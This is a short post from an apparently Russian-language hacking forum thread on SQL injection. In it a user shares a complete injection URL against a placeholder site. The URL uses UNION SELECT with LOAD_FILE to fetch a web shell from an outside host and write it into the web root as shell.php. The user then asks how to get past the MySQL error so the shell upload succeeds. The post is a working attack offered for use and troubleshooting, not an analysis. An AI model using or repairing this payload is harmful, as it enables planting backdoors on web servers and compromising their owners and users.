Тема: sql-injection
Показать сообщение отдельно

  #8  
Старый 07.11.2005, 09:43
insidex
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме:
62530

Репутация: 1
По умолчанию

http://site.com/vivat.php?r=russian&R='+UNION+SELECT+LOAD_FILE('ht tp://www.hiliv.narod.ru/shell.txt') ,null,null,null+FROM+reg_user+into+outfile+'/usr/local/www/site.com/picnic/shell.php'/*

На месте,где указан http адрес шелла http://www.hiliv.narod.ru/shell.txt, MySql громко икает с собщением об обшибке.Думаю виной здесь двойной слеш //. Можно ли как-то сформировать в данном случае успешный запрос.Заранее Приношу извинения за назойливость и огромное спасибо.
 
Ответить с цитированием